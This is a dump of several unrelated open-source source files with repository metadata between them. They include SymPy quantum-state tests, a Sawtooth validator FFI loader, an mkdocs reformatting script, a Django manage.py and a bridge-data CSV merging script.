return self.bands[band]
return object.__getattribute__(self, bandname)
class ALIband(USGSL1band):
"""
Represents a band of an EO-1 ALI scene.
"""
def __init__(self, filepath, band=None, scene=None):
super(ALIband, self).__init__(filepath, band=band, scene=scene)
_validate_platformorigin('ALI', self.spacecraft, self.sensor)
@property
def radiance(self):
"""Radiance in W / um / m^2 / sr derived from digital number
and metadata, as numpy array"""
if not self.meta:
raise PygaarstRasterError(
"Impossible to retrieve metadata for band. " +
"No radiance calculation possible.")
self.gain = self.meta[
'RADIANCE_SCALING']['BAND%s_SCALING_FACTOR' % self.band]
self.bias = self.meta['RADIANCE_SCALING']['BAND%s_OFFSET' % self.band]
return ir.dn2rad(self.data, self.gain, self.bias)
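# --- usage sketch, not part of the original module (the directory name is made up) ---
# scene = ALIscene('/data/EO1A0690142014158110KF')
# band3 = scene.band3       # resolved through ALIscene.__getattr__ above
# rad = band3.radiance      # W / um / m^2 / sr, from gain/offset metadata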
| 35.402174
| 78
| 0.628185
|
4a14726429f1bad904f3af76d440017a292ce8ac
| 6,080
|
py
|
Python
|
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | 1
|
2021-06-22T23:27:55.000Z
|
2021-06-22T23:27:55.000Z
|
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_state.py
|
ethankward/sympy
|
44664d9f625a1c68bc492006cfe1012cb0b49ee4
|
[
"BSD-3-Clause"
] | 1
|
2020-02-06T17:54:20.000Z
|
2020-02-06T17:54:20.000Z
|
from sympy import (Add, conjugate, diff, I, Integer, Mul, oo, pi, Pow,
Rational, sin, sqrt, Symbol, symbols, sympify, S)
from sympy.testing.pytest import raises
from sympy.physics.quantum.dagger import Dagger
from sympy.physics.quantum.qexpr import QExpr
from sympy.physics.quantum.state import (
Ket, Bra, TimeDepKet, TimeDepBra,
KetBase, BraBase, StateBase, Wavefunction
)
from sympy.physics.quantum.hilbert import HilbertSpace
x, y, t = symbols('x,y,t')
class CustomKet(Ket):
@classmethod
def default_args(self):
return ("test",)
class CustomKetMultipleLabels(Ket):
@classmethod
def default_args(self):
return ("r", "theta", "phi")
class CustomTimeDepKet(TimeDepKet):
@classmethod
def default_args(self):
return ("test", "t")
class CustomTimeDepKetMultipleLabels(TimeDepKet):
@classmethod
def default_args(self):
return ("r", "theta", "phi", "t")
def test_ket():
k = Ket('0')
assert isinstance(k, Ket)
assert isinstance(k, KetBase)
assert isinstance(k, StateBase)
assert isinstance(k, QExpr)
assert k.label == (Symbol('0'),)
assert k.hilbert_space == HilbertSpace()
assert k.is_commutative is False
# Make sure this doesn't get converted to the number pi.
k = Ket('pi')
assert k.label == (Symbol('pi'),)
k = Ket(x, y)
assert k.label == (x, y)
assert k.hilbert_space == HilbertSpace()
assert k.is_commutative is False
assert k.dual_class() == Bra
assert k.dual == Bra(x, y)
assert k.subs(x, y) == Ket(y, y)
k = CustomKet()
assert k == CustomKet("test")
k = CustomKetMultipleLabels()
assert k == CustomKetMultipleLabels("r", "theta", "phi")
assert Ket() == Ket('psi')
def test_bra():
b = Bra('0')
assert isinstance(b, Bra)
assert isinstance(b, BraBase)
assert isinstance(b, StateBase)
assert isinstance(b, QExpr)
assert b.label == (Symbol('0'),)
assert b.hilbert_space == HilbertSpace()
assert b.is_commutative is False
# Make sure this doesn't get converted to the number pi.
b = Bra('pi')
assert b.label == (Symbol('pi'),)
b = Bra(x, y)
assert b.label == (x, y)
assert b.hilbert_space == HilbertSpace()
assert b.is_commutative is False
assert b.dual_class() == Ket
assert b.dual == Ket(x, y)
assert b.subs(x, y) == Bra(y, y)
assert Bra() == Bra('psi')
def test_ops():
k0 = Ket(0)
k1 = Ket(1)
k = 2*I*k0 - (x/sqrt(2))*k1
assert k == Add(Mul(2, I, k0),
Mul(Rational(-1, 2), x, Pow(2, S.Half), k1))
def test_time_dep_ket():
k = TimeDepKet(0, t)
assert isinstance(k, TimeDepKet)
assert isinstance(k, KetBase)
assert isinstance(k, StateBase)
assert isinstance(k, QExpr)
assert k.label == (Integer(0),)
assert k.args == (Integer(0), t)
assert k.time == t
assert k.dual_class() == TimeDepBra
assert k.dual == TimeDepBra(0, t)
assert k.subs(t, 2) == TimeDepKet(0, 2)
k = TimeDepKet(x, 0.5)
assert k.label == (x,)
assert k.args == (x, sympify(0.5))
k = CustomTimeDepKet()
assert k.label == (Symbol("test"),)
assert k.time == Symbol("t")
assert k == CustomTimeDepKet("test", "t")
k = CustomTimeDepKetMultipleLabels()
assert k.label == (Symbol("r"), Symbol("theta"), Symbol("phi"))
assert k.time == Symbol("t")
assert k == CustomTimeDepKetMultipleLabels("r", "theta", "phi", "t")
assert TimeDepKet() == TimeDepKet("psi", "t")
def test_time_dep_bra():
b = TimeDepBra(0, t)
assert isinstance(b, TimeDepBra)
assert isinstance(b, BraBase)
assert isinstance(b, StateBase)
assert isinstance(b, QExpr)
assert b.label == (Integer(0),)
assert b.args == (Integer(0), t)
assert b.time == t
assert b.dual_class() == TimeDepKet
assert b.dual == TimeDepKet(0, t)
k = TimeDepBra(x, 0.5)
assert k.label == (x,)
assert k.args == (x, sympify(0.5))
assert TimeDepBra() == TimeDepBra("psi", "t")
def test_bra_ket_dagger():
x = symbols('x', complex=True)
k = Ket('k')
b = Bra('b')
assert Dagger(k) == Bra('k')
assert Dagger(b) == Ket('b')
assert Dagger(k).is_commutative is False
k2 = Ket('k2')
e = 2*I*k + x*k2
assert Dagger(e) == conjugate(x)*Dagger(k2) - 2*I*Dagger(k)
def test_wavefunction():
x, y = symbols('x y', real=True)
L = symbols('L', positive=True)
n = symbols('n', integer=True, positive=True)
f = Wavefunction(x**2, x)
p = f.prob()
lims = f.limits
assert f.is_normalized is False
assert f.norm is oo
assert f(10) == 100
assert p(10) == 10000
assert lims[x] == (-oo, oo)
assert diff(f, x) == Wavefunction(2*x, x)
raises(NotImplementedError, lambda: f.normalize())
assert conjugate(f) == Wavefunction(conjugate(f.expr), x)
assert conjugate(f) == Dagger(f)
g = Wavefunction(x**2*y + y**2*x, (x, 0, 1), (y, 0, 2))
lims_g = g.limits
assert lims_g[x] == (0, 1)
assert lims_g[y] == (0, 2)
assert g.is_normalized is False
assert g.norm == sqrt(42)/3
assert g(2, 4) == 0
assert g(1, 1) == 2
assert diff(diff(g, x), y) == Wavefunction(2*x + 2*y, (x, 0, 1), (y, 0, 2))
assert conjugate(g) == Wavefunction(conjugate(g.expr), *g.args[1:])
assert conjugate(g) == Dagger(g)
h = Wavefunction(sqrt(5)*x**2, (x, 0, 1))
assert h.is_normalized is True
assert h.normalize() == h
assert conjugate(h) == Wavefunction(conjugate(h.expr), (x, 0, 1))
assert conjugate(h) == Dagger(h)
piab = Wavefunction(sin(n*pi*x/L), (x, 0, L))
assert piab.norm == sqrt(L/2)
assert piab(L + 1) == 0
assert piab(0.5) == sin(0.5*n*pi/L)
assert piab(0.5, n=1, L=1) == sin(0.5*pi)
assert piab.normalize() == \
Wavefunction(sqrt(2)/sqrt(L)*sin(n*pi*x/L), (x, 0, L))
assert conjugate(piab) == Wavefunction(conjugate(piab.expr), (x, 0, L))
assert conjugate(piab) == Dagger(piab)
k = Wavefunction(x**2, 'x')
assert type(k.variables[0]) == Symbol
| 26.550218
| 79
| 0.604112
|
4a147289f460c0edcb26bee4a7afa4c9da070b8f
| 115
|
py
|
Python
|
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
flask_admin_tablefield/__init__.py
|
cllen/flask-admin-tablefield
|
f9e6c758e0c8545b4b60e24a4e3d4669c60481ee
|
[
"MIT"
] | null | null | null |
from .tablefield import TableField
from .tablecheckboxfield import TableCheckBoxField
__version__ = '0.2.2022.3.7'
| 28.75
| 50
| 0.826087
|
4a1472afb730bac4aff94a5bb912b3dd26e85e7c
| 2,192
|
py
|
Python
|
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
validator/sawtooth_validator/ffi.py
|
PrantikMullick/sawtooth-core
|
00255c4ca834a3240c38f235cf28d3c23cad015e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import ctypes
import logging
import os
import sys
LOGGER = logging.getLogger(__name__)


class Library:
    def __init__(self):
        lib_prefix_mapping = {
            "darwin": "lib",
            "linux": "lib",
            "linux2": "lib",
        }
        lib_suffix_mapping = {
            "darwin": ".dylib",
            "linux": ".so",
            "linux2": ".so",
        }
        os_name = sys.platform
        lib_location = os.environ.get('SAWTOOTH_LIB_HOME', '')
        if lib_location and lib_location[-1:] != '/':
            lib_location += '/'
        try:
            lib_prefix = lib_prefix_mapping[os_name]
            lib_suffix = lib_suffix_mapping[os_name]
        except KeyError:
            raise OSError("OS isn't supported: {}".format(os_name))
        library_path = "{}{}sawtooth_validator{}".format(
            lib_location, lib_prefix, lib_suffix)
        LOGGER.debug("loading library %s", library_path)
        self._cdll = ctypes.CDLL(library_path)

    def call(self, name, *args):
        return getattr(self._cdll, name)(*args)


LIBRARY = Library()


def prepare_byte_result():
    """Returns pair of byte pointer and size value for use as return parameters
    in a LIBRARY call
    """
    return (ctypes.POINTER(ctypes.c_uint8)(), ctypes.c_size_t(0))


def from_c_bytes(c_data, c_data_len):
    """Takes a byte pointer and a length and converts it into a python bytes
    value.
    """
    # pylint: disable=invalid-slice-index
    return bytes(c_data[:c_data_len.value])
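

# A hedged sketch of how these helpers combine around a LIBRARY call; the
# symbol name "ffi_example_get_data" is illustrative, not a real export:
def _example_ffi_call():
    (vec_ptr, vec_len) = prepare_byte_result()
    status = LIBRARY.call("ffi_example_get_data",
                          ctypes.byref(vec_ptr), ctypes.byref(vec_len))
    if status != 0:
        raise RuntimeError("FFI call failed with status {}".format(status))
    return from_c_bytes(vec_ptr, vec_len)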
| 28.102564
| 80
| 0.619069
|
4a1473e651d956328399dc319a4bb6b90976c075
| 1,388
|
py
|
Python
|
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 3
|
2020-02-09T23:25:37.000Z
|
2021-01-19T09:44:12.000Z
|
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | null | null | null |
model-optimizer/mo/front/kaldi/extractors/memoryoffset_ext_test.py
|
zhoub/dldt
|
e42c01cf6e1d3aefa55e2c5df91f1054daddc575
|
[
"Apache-2.0"
] | 2
|
2020-04-18T16:24:39.000Z
|
2021-01-19T09:42:19.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from mo.front.kaldi.extractors.common_ext_test import KaldiFrontExtractorTest
from mo.front.kaldi.extractors.memoryoffset_ext import MemoryOffsetFrontExtractor
from mo.ops.memoryoffset import MemoryOffset
from mo.ops.op import Op


class MemoryOffsetFrontExtractorTest(KaldiFrontExtractorTest):
    @classmethod
    def register_op(cls):
        Op.registered_ops['memoryoffset'] = MemoryOffset

    @classmethod
    def create_pb_for_test_node(cls):
        pb = {'pair_name': 'my_pair',
              't': -5,
              'has_default': False
              }
        cls.test_node['parameters'] = pb

    def test_extract(self):
        MemoryOffsetFrontExtractor.extract(self.test_node)
        self.assertEqual(self.test_node['pair_name'], 'my_pair')
        self.assertEqual(self.test_node['t'], -5)
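
# To run just this module with the standard unittest runner (assuming the
# model-optimizer packages used by the imports above are on PYTHONPATH):
#   python -m unittest mo.front.kaldi.extractors.memoryoffset_ext_test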
| 35.589744
| 81
| 0.729827
|
4a1474974787730bfa6958adab4cc74866563f6b
| 5,516
|
py
|
Python
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 92
|
2020-05-20T15:25:39.000Z
|
2022-03-27T23:38:36.000Z
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 266
|
2020-05-19T23:26:02.000Z
|
2022-03-30T14:03:51.000Z
|
scripts/reformat.py
|
TheChronicMonster/docs
|
02415d0c0ba428e35af86afa39f7cb6b0114e09d
|
[
"MIT"
] | 185
|
2020-05-19T22:46:57.000Z
|
2022-03-30T13:33:38.000Z
|
#!/usr/bin/env python3
# rm -rf goal && mkdir goal && goal generate-docs goal && ./reformat.py -doc-dir goal
import argparse
import os
import os.path
import pprint
import re
import shutil
import sys
import tempfile
from pathlib import Path

pp = pprint.PrettyPrinter(indent=4)

parser = argparse.ArgumentParser(description='Reformat markdown files to display in mkdocs.')
parser.add_argument('-doc-dir', required=True, help='Path to document directory.')
parser.add_argument('-cmd', required=False, help='Full path to command. If provided the doc-dir will be emptied and new markdown files will be generated with \'cmd generate-docs <doc-dir>\'')


def process_markdown_file(new_file, original_name, goal_depth, with_subcommand):
    """ Update markdown links to use relative paths in different directories. """
    with tempfile.NamedTemporaryFile(mode='w', dir='.', delete=False) as tmp, \
            open(new_file, 'r') as f:
        title = original_name.split('.')[0].replace('_', ' ')
        tmp.write("title: %s\n---\n" % title)
        for line in f:
            # Drop the trailing newline; exactly one is added back on write.
            result = line.rstrip('\n')
            m = re.search(r'(^\* \[.*\]\()(.*)(\).*$)', result)
            # Most lines won't match; write them unmodified.
            if m is not None:
                # Grab the command, i.e. 'goal' in 'goal.md', or 'delete' in 'goal_account_multisig_delete.md'
                # Find out how many levels away the link is (siblings need ../, parents need ../../)
                link_parts = m.group(2).split('.')[0].split('_')
                subcommand = link_parts[-1]
                prefix_mul = goal_depth - link_parts.index(subcommand) + 2
                # Subcommands have an extra level of nesting
                if subcommand in with_subcommand:
                    link = '../'*prefix_mul + ((subcommand + '/')*2)
                else:
                    link = '../'*prefix_mul + subcommand + '/'
                result = "%s%s%s" % (m.group(1), link, m.group(3))
            # Remove the auto generated line.
            if 'Auto generated by spf13/cobra on' in line:
                result = ""
            tmp.write(result + "\n")
    os.replace(tmp.name, new_file)


def process(dirpath):
    """ Move files into a directory structure and add .pages files. """
    with_subcommand = []
    moved_files = []
    files = os.listdir(dirpath)
    for f in files:
        parts = f.split('_')
        new_name = parts.pop()
        root_path = '/'.join(parts)
        # If this is a "root" file, append one more directory.
        # For example "goal_account.md" is a root because of commands like "goal_account_new.md"
        root_check = parts.copy()
        root_check.append(re.sub(r'\.md', '', new_name))
        extended_path = '_'.join(root_check) + '_'
        is_root = any(extended_path in s for s in files)
        if is_root:
            with_subcommand.append(root_check[-1])
            parts = root_check
            root_path = '/'.join(parts)
        try:
            os.makedirs(dirpath + '/' + root_path)
        except FileExistsError:
            pass  # this is expected to happen.
        new_file = dirpath + '/' + root_path + '/' + new_name
        os.rename(dirpath + '/' + f, new_file)
        moved_files.append((new_file, len(parts) - 1, f))
        # Make sure the root file is displayed first in the navigation bar.
        if is_root:
            # Use a distinct name so the loop variable f isn't shadowed.
            with open(dirpath + '/' + root_path + '/.pages', 'w') as pages:
                pages.write('title: %s\n' % ' '.join(parts))
                pages.write('arrange:\n - %s' % new_name)
    # Fix the links at the very end so that we know which ones have subcommands
    for f, depth, original_name in moved_files:
        process_markdown_file(f, original_name, depth, with_subcommand)
    return len(moved_files)


def fix_root(num_files_modified, path):
    """
    The algorithm puts everything one directory too deep; move it up.
    """
    files = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
    directories = [f for f in os.listdir(path) if os.path.isdir(os.path.join(path, f))]
    if num_files_modified == 1 and len(files) == 1:
        p = Path(path)
        pp.pprint(p)
        shutil.move(os.path.join(path, files[0]), os.path.join(Path(path).parents[0], files[0]))
        shutil.rmtree(path)
        return
    if len(files) != 0:
        print("WRONG NUMBER OF FILES IN ROOT PATH: %d" % len(files))
        return
    if len(directories) != 1:
        print("WRONG NUMBER OF DIRECTORIES IN ROOT PATH: %d" % len(directories))
        return
    extra_dir = path + '/' + directories[0]
    shutil.move(extra_dir, path + '.tmp')
    os.rmdir(path)
    shutil.move(path + '.tmp', path)


if __name__ == "__main__":
    args = parser.parse_args()
    if os.sep != '/':
        print("Won't work on this system.")
        sys.exit(1)
    if not os.path.isdir(args.doc_dir):
        os.makedirs(args.doc_dir)
    # Don't break if a trailing slash is provided.
    if args.doc_dir[-1] == '/':
        args.doc_dir = args.doc_dir[:-1]
    # Check if we should regenerate the markdown files.
    if args.cmd is not None:
        print("Deleting directory: %s" % args.doc_dir)
        shutil.rmtree(args.doc_dir)
        os.makedirs(args.doc_dir)
        os.system('%s generate-docs %s' % (args.cmd, args.doc_dir))
    num_files_modified = process(args.doc_dir)
    # No need to fix_root if there are subcommands.
    fix_root(num_files_modified, args.doc_dir)
    print("Finished formatting %d files." % num_files_modified)
| 38.84507
| 191
| 0.601523
|
4a1475cdf1747ddcd4d11e9a7b4a7b9d6a845995
| 541
|
py
|
Python
|
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
manage.py
|
MenheraMikumo/Mnemosyne
|
d606458c2ad8059ce6cc50cea532c3abff0589f4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import os
import sys


if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Mnemosyne.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
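
# Standard Django entry point; typical invocations (Django's stock CLI,
# nothing project-specific):
#   python manage.py migrate
#   python manage.py runserver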
| 33.8125
| 73
| 0.687616
|
4a1476717cbc6ed089929118e5a474bfa9e82671
| 1,797
|
py
|
Python
|
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | 2
|
2020-10-21T22:14:15.000Z
|
2020-10-21T22:14:16.000Z
|
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | null | null | null |
.history/postImages/index_20201006210614.py
|
Lambda-School-Labs/Labs27-C-Bridges-To-Prosperity-BE
|
9a8289d8550115362c46dea3ed8570b789c09a10
|
[
"MIT"
] | null | null | null |
import csv
import requests

# Read both CSVs, skipping the header row of each.
with open("bridgeData3.csv", 'r') as f:
    df = f.readlines()
with open('final.csv', 'r') as f:
    fin = f.readlines()
finCsv = fin[1:]
# url = https://b2ptc.herokuapp.com/bridges
finalCsv = df[1:]

# Map each project code to its bridge name and before/after image URLs.
obj = {}
for i in finalCsv:
    x = i.split(',')
    obj[x[1]] = {'bridge_name': x[0], 'proj_code': x[1],
                 'before_img': x[2], 'after_img': x[3][0:-1]}

# Merge the two files, keyed by bridge id, keeping only rows whose project
# code also appears in the image map above.
finalObj = {}
for i in finCsv:
    x = i.split(',')
    if x[6] in obj:
        finalObj[x[6]] = {}
        finalObj[x[6]]['province'] = x[0]
        finalObj[x[6]]['district'] = x[1]
        finalObj[x[6]]['sector'] = x[2]
        finalObj[x[6]]['cell'] = x[3]
        finalObj[x[6]]['bridge_site'] = x[4]
        finalObj[x[6]]['stage'] = x[5]
        finalObj[x[6]]['id'] = int(x[6])
        finalObj[x[6]]['type'] = x[7]
        finalObj[x[6]]['latt'] = float(x[8])
        finalObj[x[6]]['long'] = float(x[9])
        # Some "served" cells are not numeric; fall back to the raw string.
        try:
            serv = float(x[10])
        except ValueError:
            serv = x[10]
        # sv = x[13].split(' ')[2]  # parsed in the original snapshot but never used
        finalObj[x[6]]['served'] = serv
        finalObj[x[6]]['community_served'] = x[14]
        # Province ids are occasionally non-numeric as well.
        try:
            pId = int(x[15])
        except ValueError:
            pId = x[15]
        finalObj[x[6]]['provId'] = pId
        finalObj[x[6]]['districtId'] = int(x[16])
        finalObj[x[6]]['sectorId'] = int(x[17])
        finalObj[x[6]]['cellId'] = int(x[18][0:-1])

for key in finalObj:
    print(key)
# for i in finalCsv:
#     x = i.split(',')
#     requests.put(url+x[0],data={before:x[2],after:x[3]})
# pull each id, before image and after image from df
# for each data item do a put request with the id as the param id
# and then put the before and after image in a dict and place it as the data
# for the put request; a hedged sketch follows below.
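

# A hedged sketch of the upload step the comments above describe (endpoint from
# the commented url above; field names taken from obj; not in the original file):
def _upload_images_sketch():
    url = 'https://b2ptc.herokuapp.com/bridges/'
    for record in obj.values():
        requests.put(url + record['proj_code'],
                     data={'before_img': record['before_img'],
                           'after_img': record['after_img']})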
| 29.95
| 97
| 0.513634
|